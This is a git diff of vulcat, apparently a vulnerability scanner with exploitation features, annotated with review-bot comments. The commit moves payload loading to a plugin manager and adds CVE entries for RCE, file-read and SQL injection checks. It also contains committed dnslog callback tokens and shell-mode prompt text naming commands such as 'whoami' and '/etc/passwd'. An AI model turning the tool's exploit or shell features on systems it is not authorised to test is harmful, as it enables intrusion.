++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| nexus-cve-2019-5475-rce | Y | 2.x yum插件 远程命令执行 |
+| nexus-cve-2019-7238-rce | Y | 3.x 远程命令执行 |
+| nexus-cve-2019-15588-rce | Y | 2019-5475的绕过 |
+| nexus-cve-2020-10199-rce | Y | 3.x 远程命令执行 |
+| nexus-cve-2020-10204-rce | Y | 3.x 远程命令执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| nodejs-cve-2017-14849-fileread | Y | Node.js目录穿越 |
+| nodejs-cve-2021-21315-rce | Y | Node.js命令执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| nodered-cve-2021-3223-fileread | Y | Node-RED 任意文件读取 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| phpmyadmin-cve-2018-12613-fileinclude-fileread | - | phpMyadmin Scripts/setup.php 反序列化 |
+| phpmyadmin-wooyun-2016-199433-unserialize | Y | phpMyadmin 4.8.1 远程文件包含 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| phpunit-cve-2017-9841-rce | Y | PHPUnit 远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| ruby-on-rails-cve-2018-3760-fileread | Y | Ruby on Rails 路径遍历 |
+| ruby-on-rails-cve-2019-5418-fileread | Y | Ruby on Rails 任意文件读取 |
+| ruby-on-rails-cve-2020-8163-rce | - | Ruby on Rails 命令执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| showdoc-cnvd-2020-26585-fileupload | - | ShowDoc 任意文件上传 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| spring-security-oauth-cve-2016-4977-rce | - | Spring Security OAuth2 远程命令执行 |
+| spring-data-rest-cve-2017-8046-rce | - | Spring Data Rest 远程命令执行 |
+| spring-data-commons-cve-2018-1273-rce | Y | Spring Data Commons 远程命令执行 |
+| spring-cloud-config-cve-2020-5410-fileread | Y | Spring Cloud目录遍历 |
+| spring-boot-cve-2021-21234-fileread | Y | Spring Boot目录遍历 |
+| spring-cloud-gateway-cve-2022-22947-rce | - | Spring Cloud Gateway SpEl远程代码执行 |
+| spring-cloud-function-cve-2022-22963-rce | Y | Spring Cloud Function SpEL远程代码执行 |
+| spring-cve-2022-22965-rce | - | Spring Framework远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| supervisor-cve-2017-11610-rce | - | Supervisor 远程命令执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| thinkphp-cve-2018-1002015-rce | Y | ThinkPHP5.x 远程代码执行 |
+| thinkphp-cnvd-2018-24942-rce | Y | 未开启强制路由导致RCE |
+| thinkphp-cnnvd-201901-445-rce | Y | 核心类Request远程代码执行 |
+| thinkphp-cnvd-2022-86535-rce | - | ThinkPHP 多语言模块命令执行 |
+| thinkphp-2.x-rce | - | ThinkPHP2.x 远程代码执行 |
+| thinkphp-5-ids-sqlinject | - | ThinkPHP5 ids参数SQL注入 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| ueditor-ssrf | - | Ueditor编辑器SSRF |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| uwsgiphp-cve-2018-7490-fileread | Y | uWSGI-PHP目录穿越 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| vmware-vcenter-2020-10-fileread | Y | 2020年 VMware vCenter 6.5任意文件读取 |
+| vmware-vcenter-cve-2021-21972-fileupload-rce | - | VMware vSphere Client 远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| oracle-weblogic-cve-2014-4210-ssrf | - | Weblogic 服务端请求伪造 |
+| oracle-weblogic-cve-2017-10271-unserialize | - | Weblogic XMLDecoder反序列化 |
+| oracle-weblogic-cve-2019-2725-unserialize | - | Weblogic wls9_async反序列化 |
+| oracle-weblogic-cve-2020-14750-bypass | - | Weblogic 权限验证绕过 |
+| oracle-weblogic-cve-2020-14882-rce-unauth | Y | Weblogic 未授权命令执行 |
+| oracle-weblogic-cve-2021-2109-rce | - | Weblogic LDAP 远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| webmin-cve-2019-15107-rce | Y | Webmin Pre-Auth 远程代码执行 |
+| webmin-cve-2019-15642-rce | Y | Webmin 远程代码执行 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| yonyou-grp-u8-cnnvd-201610-923-sqlinject | - | 用友GRP-U8 Proxy SQL注入 |
+| yonyou-nc-cnvd-2021-30167-rce | Y | 用友NC BeanShell远程命令执行 |
+| yonyou-erp-nc-ncfindweb-fileread | - | 用友ERP-NC NCFindWeb目录遍历 |
+| yonyou-u8-oa-getsession-dsinfo | - | 用友U8 OA getSessionList.jsp 敏感信息泄漏 |
+| yonyou-u8-oa-test.jsp-sqlinject | - | 用友U8 OA test.jsp SQL注入 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+| zabbix-cve-2016-10134-sqlinject | - | latest.php或jsrpc.php存在sql注入 |
++----------------------------------------------------------+-----+----------------------------------------------------------------------+
+vulcat-2.0.0/2023.03.15
+112/Poc
+55/Shell
```
@@ -236,6 +242,7 @@ vulcat-1.2.0/2023.03.01
* [vulhub](https://github.com/vulhub/vulhub)
* [vulfocus](https://github.com/fofapro/vulfocus)
* [ttkbootstrap](https://github.com/israel-dryer/ttkbootstrap/)
+* [Xray](github.com/chaitin/xray)
## Star History
[![Star History Chart](https://api.star-history.com/svg?repos=CLincat/vulcat&type=Timeline)](https://star-history.com/#Ashutosh00710/github-readme-activity-graph&Timeline)
\ No newline at end of file
diff --git a/config.yaml b/config.yaml
index 649f0e0..a2c31df 100644
--- a/config.yaml
+++ b/config.yaml
@@ -7,8 +7,8 @@ ceye-token: Null
# dnslog.pw的域名和token
# 默认带有试用域名和Token, 会过期, 可以替换为自己的
-dnslog-pw-domain: ykwc2z0d.dnslog.pw
-dnslog-pw-token: cda3499b
+dnslog-pw-domain: im4v3kv9.dnslog.pw
+dnslog-pw-token: 1221dd92
# 请求Header
# 运行时指定--user-agent参数, 会覆盖config.yaml的User-Agent
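Review bot: The replacement `dnslog-pw-domain` / `dnslog-pw-token` pair on the two added lines is still a live shared credential committed to the repository, so anyone with the source can read the DNS callbacks of every user who keeps the default config, and the comment above already concedes the value expires. Treat it like the `ceye-token: Null` entry at the top of the file: ship `dnslog-pw-token: Null`, have the loader fall back to an environment variable, and fail with a clear message when nothing is set. Rotating the token per release, as this commit does, leaves every previous value readable in git history anyway.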
@@ -18,27 +18,4 @@ headers:
Accept: "*/*"
Connection: "close"
-# 当指定-a参数为all时, 或框架指纹识别失败时, 将会使用以下框架的POC进行扫描, 可以控制开关
-applist: [
- 'airflow', 'alidruid', 'apachedruid', 'apacheunomi', 'apisix', 'appweb',
- 'cisco', 'confluence',
- 'discuz', 'django', 'drupal',
- 'elasticsearch',
- 'f5bigip', 'fastjson', 'flink',
- 'gitea', 'gitlab', 'grafana', 'gocd',
- 'hadoop', 'httpd',
- 'influxdb',
- 'jenkins', 'jetty', 'jupyter', 'joomla', 'jboss',
- 'keycloak',
- 'landray',
- 'minihttpd', 'mongoexpress',
- 'nacos', 'nexus', 'nodejs', 'nodered',
- 'phpmyadmin', 'phpunit',
- 'rails',
- 'showdoc', 'skywalking', 'solr', 'spring', 'supervisor',
- 'thinkphp', 'tomcat',
- 'ueditor', 'uwsgiphp',
- 'weblogic', 'webmin',
- 'yonyou',
- 'zabbix'
-]
+payloads-path: ./payloads/
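Review bot: The new `payloads-path: ./payloads/` is a relative path, and since `lib/initial/config.py` in this commit passes it straight to `PluginManager.SetPluginPath`, the directory that plugin code is loaded from depends on the process's working directory rather than on the project tree. Either document that vulcat must be started from its own directory, or resolve the value against the project root in the loader before use. A comment on the line such as `# payload directory; resolved relative to the working directory at startup` would at least make the current base explicit.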
diff --git a/demo.py b/demo.py
new file mode 100644
index 0000000..91fa40b
--- /dev/null
+++ b/demo.py
@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+ def __init__(self):
+ pass
+
+ def POC(self, clients):
+ pass
+
+ def EXP(self, clients):
+ pass
+
+ def Start(self, clients):
+ return self.POC(clients)
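Review bot: `Scan.__init__` on the added lines replaces the base-class constructor with `pass` and never calls `super().__init__()`, so any state `Vuln_Scan` sets up in its own constructor (not visible here) is missing on instances built from this template. Either drop the override or make its body `super().__init__()`. The template also says nothing about the contract `POC`/`EXP` must satisfy; since `coreScan.addPOC` in this commit wraps `item.Start` in a `thread` and later reads `t.get_result()`, a class docstring stating what `Start` is expected to return would save every plugin author a trip into PluginManager.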
diff --git a/lib/api/dns.py b/lib/api/dns.py
index 82e8e4d..5264a50 100644
--- a/lib/api/dns.py
+++ b/lib/api/dns.py
@@ -13,6 +13,7 @@
from lib.api.dnslog_cn import *
from lib.api.dnslog_pw import *
from lib.api.ceye_io import *
+from time import sleep
class DNS():
def __init__(self):
@@ -56,8 +57,10 @@ def domain(self, sessid):
except:
return 'dnslogGetError'
- def result(self, md, sessid):
+ def result(self, md, sessid, waitTime=5):
try:
+ sleep(waitTime)
+
if (('ceye' in self.dns_platform) and (self.ceye_domain)):
return self.get_ceye_result(md)
elif (('dnslog-pw' in self.dns_platform) and (self.dnslog_pw_domain)):
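Review bot: `sleep(waitTime)` on the added line runs before any platform check, so the caller pays the full delay even when no DNS platform is configured and the method falls through to whatever the branches below the hunk return. Moving the sleep into the branch that actually polls a platform, or returning early when neither `self.ceye_domain` nor `self.dnslog_pw_domain` is set, avoids a fixed stall per call. If `result`'s own `except` is bare like the one at the top of this hunk, a Ctrl-C during the sleep is also swallowed and reported as a lookup error; `except Exception:` keeps the interrupt working. The method's body continues past the hunk.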
diff --git a/lib/core/client.py b/lib/core/client.py
index 57a8c28..842e2a9 100644
--- a/lib/core/client.py
+++ b/lib/core/client.py
@@ -57,8 +57,8 @@ def __init__(
self.timeout = timeout
self.headers = headers
self.proxies = proxies
- self.domain = logger.get_domain(base_url)
- self.protocol_domain = logger.get_domain(base_url, protocol=True)
+ self.domain = logger.get_domain(base_url) # * 域名
+ self.protocol_domain = logger.get_domain(base_url, protocol=True) # * 协议://域名
self.delay = config.get('delay')
@@ -111,6 +111,8 @@ def request(self, method, path, **kwargs):
logger.logging(vul_info, 'Error')
self.print_error_info(errors.get('Error'))
return None
+ except KeyboardInterrupt:
+ raise KeyboardInterrupt
except:
logger.logging('Error', 'Error')
return None
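Review bot: `raise KeyboardInterrupt` on the added line instantiates a fresh exception and discards the original traceback; a bare `raise` re-raises the caught one intact. The new handler only exists because the following `except:` is bare, which also swallows `SystemExit` and `GeneratorExit`; changing that clause to `except Exception:` makes the added branch unnecessary. The `request` method begins outside the hunk.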
diff --git a/lib/core/coreScan.py b/lib/core/coreScan.py
index 3f6ca7c..121d033 100644
--- a/lib/core/coreScan.py
+++ b/lib/core/coreScan.py
@@ -8,65 +8,14 @@
from lib.tool import check
from lib.tool import timed
from lib.report import output
+from lib.tool.thread import thread
from lib.plugins.fingerprint.waf import waf
from lib.plugins.fingerprint.webapp import webapp
from lib.plugins.shell import shell
-from payloads.AlibabaDruid.main import alidruid
-from payloads.AlibabaNacos.main import nacos
-from payloads.ApacheAirflow.main import airflow
-from payloads.ApacheAPISIX.main import apisix
-from payloads.ApacheDruid.main import apachedruid
-from payloads.ApacheFlink.main import flink
-from payloads.ApacheHadoop.main import hadoop
-from payloads.ApacheHttpd.main import httpd
-# from payloads.ApacheKafka.main import kafka # 2023/02/22 未测试准确性
-from payloads.ApacheSkyWalking.main import skywalking
-from payloads.ApacheSolr.main import solr
-from payloads.ApacheTomcat.main import tomcat
-from payloads.ApacheUnomi.main import apacheunomi
-# from payloads.ApacheStruts2 import struts2 # 2022/11/04被移除
-from payloads.AppWeb.main import appweb
-from payloads.AtlassianConfluence.main import confluence
-from payloads.Cisco.main import cisco
-from payloads.Discuz.main import discuz
-from payloads.Django.main import django
-from payloads.Drupal.main import drupal
-from payloads.ElasticSearch.main import elasticsearch
-from payloads.F5BIGIP.main import f5bigip
-from payloads.Fastjson.main import fastjson
-from payloads.Gitea.main import gitea
-from payloads.Gitlab.main import gitlab
-from payloads.GoCD.main import gocd
-from payloads.Grafana.main import grafana
-from payloads.Influxdb.main import influxdb
-from payloads.JBoss.main import jboss
-from payloads.Jenkins.main import jenkins
-from payloads.Jetty.main import jetty
-from payloads.Joomla.main import joomla
-from payloads.Jupyter.main import jupyter
-from payloads.Keycloak.main import keycloak
-# from payloads.Kindeditor.main import kindeditor # 还未测试poc准确性
-from payloads.Landray.main import landray
-from payloads.MiniHttpd.main import minihttpd
-from payloads.MongoExpress.main import mongoexpress
-from payloads.Nexus.main import nexus
-from payloads.Nodejs.main import nodejs
-from payloads.NodeRED.main import nodered
-from payloads.phpMyadmin.main import phpmyadmin
-from payloads.phpUint.main import phpunit
-from payloads.RubyOnRails.main import rails
-from payloads.ShowDoc.main import showdoc
-from payloads.Spring.main import spring
-from payloads.Supervisor.main import supervisor
-from payloads.ThinkPHP.main import thinkphp
-from payloads.Ueditor.main import ueditor
-from payloads.uWSGIPHP.main import uwsgiphp
-from payloads.Weblogic.main import weblogic
-from payloads.Webmin.main import webmin
-from payloads.Yonyou.main import yonyou
-from payloads.Zabbix.main import zabbix
+from PluginManager import PluginManager
+from PluginManager import __ALLMODEL__
from thirdparty.tqdm import tqdm
from queue import Queue
@@ -81,9 +30,7 @@ def __init__(self):
self.thread = config.get('thread') # * 线程数
self.delay = config.get('delay') # * 延时
self.url_list = config.get('url_list') # * url列表
- self.default_apps = config.get('app_list') # * 框架列表
- self.application = config.get('application')
- self.vuln = config.get('vuln') # * 是否扫描单个漏洞
+ self.vulns = config.get('vulns') # * 是否扫描单个漏洞
self.batch = config.get('batch') # * 是否启用默认选项
self.no_waf = config.get('no_waf') # * 是否启用WAF指纹识别
self.no_poc = config.get('no_poc') # * 是否启用WAF指纹识别
@@ -109,7 +56,7 @@ def start(self):
logger.info('red_ex', self.lang['core']['start']['url_error'].format(u))
continue
- if self.shell and (not self.vuln):
+ if self.shell and (not self.vulns):
logger.info('yellow_ex', self.lang['core']['start']['shell']) # ? 提示, 使用shell之前 请先使用-a和-v参数指定一个漏洞
break
@@ -144,12 +91,10 @@ def start(self):
continue
# * --------------------框架指纹识别--------------------
- self.apps = [] # * 要扫描的框架列表
- self.identify_apps = [] # * 成功识别出的框架列表
+ self.identify_apps = []
- if ((self.application == 'auto') and (not self.vuln)):
+ if ((not self.vulns)):
webapp.stop = self.stop # * 添加暂停机制
-
self.identify_apps = webapp.identify(self.client) # * 传递客户端client进行框架指纹识别
else:
logger.info('red', self.lang['core']['start']['unable'] + u) # ? 提示, 无法访问当前url
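Review bot: `if ((not self.vulns)):` on the added line wraps the condition in two redundant pairs of parentheses; `if not self.vulns:` reads the same. The explanatory comment that `self.identify_apps` carried before the change (the list of frameworks matched by fingerprinting) was dropped together with `self.apps`; `self.identify_apps = []  # frameworks matched by fingerprinting` keeps it. `start` continues outside the hunk.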
@@ -172,36 +117,20 @@ def addPOC(self):
如果指纹识别列表有内容, 则扫描识别出的框架
否则使用默认的框架列表
'''
- try:
- # * 生成扫描的框架列表
- if self.identify_apps:
- for app in self.identify_apps:
- self.apps.append(eval(app.lower())) # todo eval将 框架字符串 转为 import导入的框架对象
- else:
- for app in self.default_apps:
- self.apps.append(eval(app.lower()))
+ # * 加载Payloads
+ logger.info('yellow_ex', self.lang['core']['start']['loadPayload'])
- # * -v/--vuln 参数, 扫描单个漏洞
- if self.vuln:
- if len(self.apps) == 1:
- app = self.apps[0] # * 获取第一个框架
- poc = app.addscan(self.clients, self.vuln) # * 获取POC线程
- self.queue.put(poc) # * 加入线程
- return
- else:
- logger.info('red_ex', self.lang['core']['addpoc']['vuln_error_1']) # ? 日志, 使用-v/--vuln参数时出现错误
- logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色
- _exit(0)
-
- # * 扫描多个漏洞
- for app in self.apps: # * 根据框架列表self.apps, 获取相应poc
- pocs = app.addscan(self.clients)
- for poc in pocs: # * 将每个poc加入线程池
- self.queue.put(poc)
- except NameError:
- logger.info('red_ex', self.lang['core']['addpoc']['notfound'] + app) # ? 出错, 未找到该框架
- logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色
- _exit(0)
+ if (self.vulns) and ('all' not in self.vulns):
+ PluginManager.LoadAllPlugin(self.vulns)
+ else:
+ PluginManager.LoadAllPlugin(self.identify_apps)
+
+ # * 为每个Payload添加线程
+ try:
+ for SingleModel in __ALLMODEL__:
+ plugins = SingleModel.GetPluginObject()
+ for item in plugins:
+ self.queue.put(thread(target=item.Start, clients=self.clients))
except:
logger.info('red_ex', self.lang['core']['addpoc']['Error-1']) # ? 出错, 添加poc时出现错误
logger.info('reset', '', notime=True, print_end='') # * 重置文字颜色
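Review bot: The bare `except:` closing the new thread-creation loop catches everything raised while `GetPluginObject` runs, including `KeyboardInterrupt`, and reports all of it with the fixed `Error-1` message and no detail, so a plugin that fails to load is indistinguishable from a Ctrl-C. `except Exception as e:` with `e` included in the log line keeps the interrupt working and names the failing plugin. Separately, `-v all` makes `self.vulns` non-empty, so the fingerprinting branch earlier in this file is skipped and `LoadAllPlugin(self.identify_apps)` receives an empty list; if PluginManager treats an empty list as "load everything" that deserves a comment at the `else:`, otherwise `all` loads nothing. `addPOC` continues past the hunk.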
@@ -214,21 +143,21 @@ def scanning(self):
logger.info('yellow_ex', '', notime=True, print_end='') # * 重置文字颜色
for q in tqdm(range(queue_thread), ncols=50): # * 单个url的扫描进度条
- try:
- for i in range(self.thread): # * 根据线程数, 每次运行相应次数的poc
+ for i in range(self.thread): # * 根据线程数, 每次运行相应次数的poc
+ try:
if not self.queue.empty(): # * 如果线程池不为空, 开始扫描
t = self.queue.get() # * 从线程池取出一个poc
t.start() # * 运行一个poc
self.thread_list.append(t) # * 往线程列表添加一个已经运行的poc
else:
break # * 如果线程池为空, 结束扫描
- sleep(self.delay) # * 扫描时间间隔
- except KeyboardInterrupt:
- if self.stop():
- continue
- else:
- self.queue.queue.clear() # * 清空当前url的扫描队列
- break # * 停止当前url的扫描, 并扫描下一个url
+ sleep(self.delay) # * 扫描时间间隔
+ except KeyboardInterrupt:
+ if self.stop():
+ continue
+ else:
+ self.queue.queue.clear() # * 清空当前url的扫描队列
+ break # * 停止当前url的扫描, 并扫描下一个url
def stop(self):
''' # ! 功能还没完善
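Review bot: With `try`/`except` moved inside `for i in range(self.thread)`, the `break` in the `KeyboardInterrupt` handler now leaves only that inner loop, whereas before the move it left the outer `for q in tqdm(...)` loop; the comment still says the current URL's scan stops, but the outer loop keeps stepping through the remaining `queue_thread` iterations, each finding the cleared queue empty. If the intent is unchanged, set a flag in the handler and `break` the outer loop on it, or keep the `try` around the inner loop as before. Otherwise update the comment to describe the new behaviour.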
@@ -268,8 +197,12 @@ def end(self):
''' 结束扫描, 等待所有线程运行完毕, 生成漏洞结果并输出/保存'''
logger.info('cyan_ex', self.lang['core']['end']['wait']) # ? 日志, 等待所有线程运行完毕, 时间长短取决于timeout参数
for t in self.thread_list: # * 遍历线程列表
- t.join() # * 阻塞未完成的子线程, 等待主线程运行完毕
- self.results.append(t.get_result()) # * 添加扫描结果
+ try:
+ t.join() # * 阻塞未完成的子线程, 等待主线程运行完毕
+ self.results.append(t.get_result()) # * 添加扫描结果
+ except KeyboardInterrupt:
+ continue
+
output.output_info(self.results, self.lang) # * output处理扫描结果, 在命令行输出结果信息
# * 保存扫描结果, .html / .json / .txt
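Review bot: The new `except KeyboardInterrupt: continue` around `t.join()` means one Ctrl-C skips a single thread's result and the loop immediately blocks on the next `join()`, so the user must interrupt once per outstanding thread and each skipped result is silently missing from `self.results`. A `break` (optionally after logging how many threads were abandoned) returns control after one interrupt, and the results collected so far are still written by the `output` calls below.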
@@ -280,7 +213,7 @@ def end(self):
elif (self.output_file == 'txt'):
output.output_text(self.results, self.lang)
- if self.shell and self.vuln: # * 是否使用Shell
+ if self.shell and self.vulns: # * 是否使用Shell
self.start_shell()
self.endTime = timed.getTime() # * 结束时间
diff --git a/lib/initial/config.py b/lib/initial/config.py
index 3ca8050..65c6207 100644
--- a/lib/initial/config.py
+++ b/lib/initial/config.py
@@ -5,6 +5,7 @@
参数配置
'''
+from PluginManager import PluginManager
from lib.initial.language import language
from lib.initial.load import load_yaml
from thirdparty.requests import packages
@@ -29,6 +30,9 @@ def __init__(self, args):
args.lang = language() # * 语言
+ payloads_path = config_yaml.get('payloads-path') # * 攻击载荷路径
+ PluginManager.SetPluginPath(payloads_path) # * 设置载荷路径
+
args.url_list = [] # * url列表
if args.url:
args.url_list.append(args.url)
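Review bot: `config_yaml.get('payloads-path')` on the added line returns `None` when the key is absent, and that value goes straight into `PluginManager.SetPluginPath`; a user with a config.yaml from before this commit (which is what introduces the key) gets a failure inside the plugin loader instead of a message about the missing setting. Supply a default, e.g. `payloads_path = config_yaml.get('payloads-path', './payloads/')`, or check for `None` and log the missing key before calling `SetPluginPath`.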
@@ -107,20 +111,15 @@ def __init__(self, args):
if args.vuln:
args.vuln = args.vuln.lower()
- args.vuln = args.vuln.replace('-', '_')
- args.vuln = args.vuln.replace('.', '_')
-
- app_list = config_yaml.get('applist')
-
- if args.application in ['auto', 'all']: # * -a参数
- args.app_list = app_list
- else:
- args.app_list = args.application.split(',')
+ args.vuln = args.vuln.replace('_', '-')
+ # args.vuln = args.vuln.replace('.', '')
+ args.vulns = args.vuln.split(',')
self.global_args = vars(args) # * 转为字典
- def get(self, arg):
- return self.global_args[arg]
+ def get(self, arg, default=''):
+ return self.global_args.get(arg, default)
+ # return self.global_args[arg]
def set(self, arg, value):
self.global_args[arg] = value
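Review bot: Changing `get` to `self.global_args.get(arg, default)` with `default=''` turns a misspelled config key from a `KeyError` into a silent empty string, and callers such as `config.get('thread')`, `config.get('delay')` and `config.get('url_list')` in `coreScan.py` then carry `''` into arithmetic and iteration where the failure surfaces far from its cause. If missing keys must be tolerated, a `None` default with explicit handling at the callers that need it is safer. The two commented-out lines (`# args.vuln = args.vuln.replace('.', '')` and `# return self.global_args[arg]`) should be deleted rather than kept; git holds the history.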
diff --git a/lib/initial/language.py b/lib/initial/language.py
index 7210c6b..b457721 100644
--- a/lib/initial/language.py
+++ b/lib/initial/language.py
@@ -77,17 +77,18 @@ def language():
'name': 'Vulnerability list',
'list': 'View all payload'
},
- 'app_list_help': {
- 'title': 'Supported target types(Case insensitive)',
- 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
- },
+ # 'app_list_help': {
+ # 'title': 'Supported target types(Case insensitive)',
+ # 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
+ # },
'core': {
'start': {
'start': '[INFO] Start scanning target ',
'unable': '[WARN] Unable to connect to ',
'url_error': '[WARN] The destination {} is incorrect and needs to start with http:// or https://',
'no_poc': '[No-POC] Disable Vulnerability scanning',
- 'shell': 'When using --shell, specify a vulnerability with -a and -v first(e.g. -a httpd -v cve-2021-41773 -x)'
+ 'shell': '[WARN] When using --shell, specify a vulnerability with -v/--vuln first(e.g. -v cve-2021-41773 --shell)',
+ 'loadPayload': '[INFO] Loading payloads...',
},
'waf_finger': {
'start': '[INFO] The WAF detection for the current URL starts',
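Review bot: The `app_list_help` block is left in as four commented-out lines instead of being removed, and the same is done in the zh_cn table in the next hunk of this file; since the `-a` option it described is dropped in this commit, deleting the lines is cleaner than carrying dead text inside a several-hundred-line string table. The previous wording remains available in git history.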
@@ -205,17 +206,18 @@ def language():
'name': '漏洞列表',
'list': '查看所有Payload'
},
- 'app_list_help': {
- 'title': '支持的目标类型(-a参数, 不区分大小写)',
- 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
- },
+ # 'app_list_help': {
+ # 'title': '支持的目标类型(-a参数, 不区分大小写)',
+ # 'name': 'airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco, confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson, flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins, jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd, mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit, rails, showdoc, skywalking, solr, spring, supervisor, thinkphp, tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix'
+ # },
'core': {
'start': {
'start': '[INFO] 开始扫描目标 ',
'unable': '[WARN] 无法连接到 ',
'url_error': '[WARN] 目标{}好像不对哦, 需要以http://或https://开头',
'no_poc': '[No-POC] 不进行漏洞扫描',
- 'shell': '使用--shell时请先使用-a和-v指定一个漏洞, 例如-a httpd -v cve-2021-41773 --shell'
+ 'shell': '[WARN] 使用--shell时请先使用-v/--vuln指定一个漏洞, 例如-v cve-2021-41773 --shell',
+ 'loadPayload': '[INFO] 正在加载Payloads...',
},
'waf_finger': {
'start': '[INFO] 对当前url进行WAF检测, 请稍等...',
@@ -279,6 +281,10 @@ def language():
# * --list的中文
lang['zh_cn']['list'] = {
+ '74cms': {
+ 'v5.0.1-sqlinject': '74cms v5.0.1 前台AjaxPersonalController.class.php存在SQL注入',
+ 'v6.0.4-xss': '74cms v6.0.4 帮助中心搜索框XSS',
+ },
'Alibaba Druid': '阿里巴巴Druid未授权访问',
'Alibaba Nacos': {'CVE-2021-29441': '阿里巴巴Nacos未授权访问'},
'Apache Airflow': {'CVE-2020-17526': 'Airflow身份验证绕过'},
@@ -332,7 +338,7 @@ def language():
},
'F5 BIG-IP': {
'CVE-2020-5902': 'BIG-IP远程代码执行',
- 'CVE-2022-1388': 'BIG-IP身份认证绕过',
+ 'CVE-2022-1388': 'BIG-IP身份认证绕过RCE',
},
'Fastjson': {
'CNVD-2017-02833': 'Fastjson <= 1.2.24 反序列化',
@@ -413,6 +419,10 @@ def language():
},
'Ueditor': 'Ueditor编辑器SSRF',
'uWSGI-PHP': 'uWSGI-PHP目录穿越',
+ 'VMware': {
+ '2020-10-fileread': '2020年 VMware vCenter 6.5任意文件读取',
+ 'CVE-2021-21972': 'VMware vSphere Client 远程代码执行',
+ },
'Oracle Weblogic': {
'CVE-2014-4210': 'Weblogic 服务端请求伪造',
'CVE-2017-10271': 'Weblogic XMLDecoder反序列化',
@@ -441,6 +451,10 @@ def language():
# * --list的英文
lang['en_us']['list'] = {
+ '74cms': {
+ 'v5.0.1-sqlinject': 'v5.0.1 AjaxPersonalController.class.php SQLinject',
+ 'v6.0.4-xss': 'v6.0.4 help center search box-XSS',
+ },
'Alibaba Druid': 'Alibaba Druid unAuthorized',
'Alibaba Nacos': {'CVE-2021-29441': 'Alibaba Nacos unAuthorized'},
'Apache Airflow': {'CVE-2020-17526': 'Apache Airflow Authentication bypass'},
@@ -494,7 +508,7 @@ def language():
},
'F5 BIG-IP': {
'CVE-2020-5902': 'BIG-IP Remote code execution',
- 'CVE-2022-1388': 'BIG-IP Authentication bypass',
+ 'CVE-2022-1388': 'BIG-IP Authentication bypass RCE',
},
'Fastjson': {
'CNVD-2017-02833': 'Fastjson <= 1.2.24 deSerialization',
@@ -575,6 +589,10 @@ def language():
},
'Ueditor': 'Ueditor SSRF',
'uWSGI-PHP': 'uWSGI-PHP Directory traversal',
+ 'VMware': {
+ '2020-10-fileread': 'In 2020 VMware vCenter 6.5 Any file read',
+ 'CVE-2021-21972': 'VMware vSphere Client RCE',
+ },
'Oracle Weblogic': {
'CVE-2014-4210': 'Weblogic SSRF',
'CVE-2017-10271': 'Weblogic XMLDecoder deSerialization',
@@ -605,7 +623,7 @@ def language():
'identify': '[+] 识别为"{}"漏洞, 进入Shell交互模式:',
'not_shell': '[-] 没有识别到漏洞类型, 或该漏洞类型不支持Shell',
'not_request': '[-] POC结果没有返回Request(HTTP请求数据包), 无法使用Shell',
- 'input_command': '根据漏洞类型 输入相应的内容(例如"whoami"或"/etc/passwd"): ',
+ 'input_command': '根据漏洞类型 输入相应的Payload(例如whoami): ',
'not_command': '请输入命令 (可以输入“exit”退出)',
'faild_command': '[Faild] 使用该命令时发生错误',
'not_search_command': '[INFO] 替换新payload失败, 没有在旧的HTTP数据包中检测到旧的payload',
@@ -620,7 +638,7 @@ def language():
'identify': '[+] Identified as "{}" vulnerability, Enter the Shell interactive mode:',
'not_shell': '[-] The vulnerability type is not identified, or Shell is not supported by the vulnerability type',
'not_request': '[-] The poc result did not return the Request(HTTP Request), Unable to use Shell',
